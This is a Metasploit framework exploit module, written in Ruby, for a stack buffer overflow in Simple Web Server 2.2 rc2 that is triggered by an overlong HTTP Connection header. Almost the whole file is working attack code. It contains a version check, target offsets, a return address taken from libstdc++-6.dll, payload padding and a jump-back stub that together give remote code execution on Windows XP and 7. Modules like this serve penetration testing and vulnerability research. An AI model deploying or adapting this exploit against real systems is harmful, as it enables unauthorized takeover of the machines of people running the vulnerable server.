## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking HttpFingerprint = { :pattern => [ /PMSoftware-SWS/ ] } include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Simple Web Server Connection Header Buffer Overflow", 'Description' => %q{ This module exploits a vulnerability in Simple Web Server 2.2 rc2. A remote user can send a long string data in the Connection Header to causes an overflow on the stack when function vsprintf() is used, and gain arbitrary code execution. The module has been tested successfully on Windows 7 SP1 and Windows XP SP3. }, 'License' => MSF_LICENSE, 'Author' => [ 'mr.pr0n', # Vulnerability Discovery and PoC 'juan vazquez' # Metasploit module ], 'References' => [ ['OSVDB', '84310'], ['EDB', '19937'], ['URL', 'http://ghostinthelab.wordpress.com/2012/07/19/simplewebserver-2-2-rc2-remote-buffer-overflow-exploit/'] ], 'Payload' => { 'BadChars' => "\x00\x0a\x0d", 'Space' => 2048, 'DisableNops' => true, 'PrependEncoder' => "\x81\xC4\x60\xF0\xFF\xFF", # add esp, -4000 }, 'DefaultOptions' => { 'EXITFUNC' => "process", }, 'Platform' => 'win', 'Targets' => [ [ 'SimpleWebServer 2.2-rc2 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => 0x6fcbc64b, # call edi from libstdc++-6.dll 'Offset' => 2048, 'OffsetEDI' => 84 } ] ], 'Privileged' => false, 'DisclosureDate' => "Jul 20 2012", 'DefaultTarget' => 0)) end def check res = send_request_raw({'uri'=>'/'}) if res and res.headers['Server'] =~ /PMSoftware\-SWS\/2\.[0-2]/ return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end def exploit sploit = payload.encoded sploit << rand_text(target['Offset'] - sploit.length) sploit << [target.ret].pack("V") # eip sploit << rand_text(target['OffsetEDI']) sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{sploit.length}").encode_string print_status("Trying target #{target.name}...") connect send_request_cgi({ 'uri' => '/', 'version' => '1.1', 'method' => 'GET', 'connection' => sploit }) disconnect end end